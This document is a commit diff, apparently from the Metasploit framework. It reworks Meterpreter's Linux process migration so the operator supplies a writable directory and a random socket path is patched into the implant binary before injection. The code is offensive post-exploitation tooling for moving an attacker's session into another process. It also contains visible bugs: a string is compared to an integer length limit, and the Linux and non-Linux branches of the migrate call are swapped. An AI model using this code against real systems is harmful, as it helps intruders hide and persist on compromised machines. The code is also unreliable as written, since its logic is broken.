Allow to provide writable dir

Author: jvazquez-r7

lib/rex/post/meterpreter/client_core.rb

@@ -25,6 +25,9 @@ module Meterpreter
 ###
 class ClientCore < Extension
 
+  UNIX_PATH_MAX = 108
+  DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
+
   #
   # Initializes the 'core' portion of the meterpreter client commands.
   #
@@ -180,7 +183,7 @@ def use(mod, opts = { })
   # Migrates the meterpreter instance to the process specified
   # by pid.  The connection to the server remains established.
   #
-  def migrate(pid, socket_path="/tmp/meterpreter.sock")
+  def migrate(pid, writable_dir="/tmp/")
     keepalive = client.send_keepalives
     client.send_keepalives = false
     process       = nil
@@ -216,23 +219,44 @@ def migrate(pid, socket_path="/tmp/meterpreter.sock")
     end
 
     if client.platform =~ /linux/
-      if socket_path.blank?
-        socket_path = "/tmp/meterpreter.sock"
+      if writable_dir.blank?
+        writable_dir = "/tmp/"
       end
 
-      socket_dir = ::File.dirname(socket_path)
-      stat_dir = client.fs.filestat.new(socket_dir)
+      stat_dir = client.fs.filestat.new(writable_dir)
 
       unless stat_dir.directory?
-        raise RuntimeError, "Directory #{socket_dir} not found", caller
+        raise RuntimeError, "Directory #{writable_dir} not found", caller
       end
       # Rex::Post::FileStat#writable? isn't available
     end
 
-    blob = generate_payload_stub(client, process, socket_path)
+    blob = generate_payload_stub(client, process)
 
     # Build the migration request
     request = Packet.create_request( 'core_migrate' )
+
+    if client.platform =~ /linux/i
+      socket_path = File.join(writable_dir, Rex::Text.rand_text_alpha_lower(5 + rand(5)))
+
+      if socket_path > UNIX_PATH_MAX - 1
+        raise RuntimeError, "The writable dir is too long", caller
+      end
+
+      pos = blob.index(DEFAULT_SOCK_PATH)
+
+      if pos.nil?
+        raise RuntimeError, "The meterpreter binary is wrong", caller
+      end
+
+      blob[pos, socket_path.length + 1] = socket_path + "\x00"
+
+      ep = elf_ep(blob)
+      request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000)
+      request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep)
+      request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib])
+    end
+
     request.add_tlv( TLV_TYPE_MIGRATE_PID, pid )
     request.add_tlv( TLV_TYPE_MIGRATE_LEN, blob.length )
     request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, blob, false, client.capabilities[:zlib])
@@ -242,13 +266,6 @@ def migrate(pid, socket_path="/tmp/meterpreter.sock")
       request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 1 ) # PROCESS_ARCH_X86
     end
 
-    if client.platform =~ /linux/i
-      ep = elf_ep(blob)
-      request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000)
-      request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep)
-      request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib])
-    end
-
     # Send the migration request (bump up the timeout to 60 seconds)
     client.send_request( request, 60 )
 
@@ -344,12 +361,12 @@ def shutdown
 
   private
 
-  def generate_payload_stub(client, process, socket_path)
+  def generate_payload_stub(client, process)
     case client.platform
     when /win/i
       blob = generate_windows_stub(client, process)
     when /linux/i
-      blob = generate_linux_stub(socket_path)
+      blob = generate_linux_stub
     else
       raise RuntimeError, "Unsupported platform '#{client.platform}'"
     end
@@ -405,21 +422,12 @@ def generate_windows_stub(client, process)
     blob
   end
 
-  def generate_linux_stub(socket_path)
-    pos = nil
+  def generate_linux_stub
     file = ::File.join(Msf::Config.data_directory, "meterpreter", "msflinker_linux_x86.bin")
     blob = ::File.open(file, "rb") {|f|
       f.read(f.stat.size)
     }
 
-    unless socket_path.blank?
-      pos = blob.index("/tmp/meterpreter.sock")
-    end
-
-    unless pos.nil?
-      blob[pos, socket_path.length + 1] = socket_path + "\x00"
-    end
-
     blob
   end
 

lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb

@@ -322,7 +322,7 @@ def cmd_irb(*args)
 
   def cmd_migrate_help
     if client.platform =~ /linux/
-      print_line "Usage: migrate <pid> [af_unix_socket_path]"
+      print_line "Usage: migrate <pid> [writable_path]"
     else
       print_line "Usage: migrate <pid>"
     end
@@ -349,7 +349,10 @@ def cmd_migrate(*args)
       print_error("A process ID must be specified, not a process name")
       return
     end
-    socket_path  = (args.length >= 2) ? args[1] : "/tmp/meterpreter.sock"
+
+    if client.platform =~ /linux/
+      writable_dir  = (args.length >= 2) ? args[1] : "/tmp/"
+    end
 
     begin
       server = client.sys.process.open
@@ -391,7 +394,11 @@ def cmd_migrate(*args)
     server ? print_status("Migrating from #{server.pid} to #{pid}...") : print_status("Migrating to #{pid}")
 
     # Do this thang.
-    client.core.migrate(pid, socket_path)
+    if client.platform =~ /linux/
+      client.core.migrate(pid)
+    else
+      client.core.migrate(pid, writable_dir)
+    end
 
     print_status("Migration completed successfully.")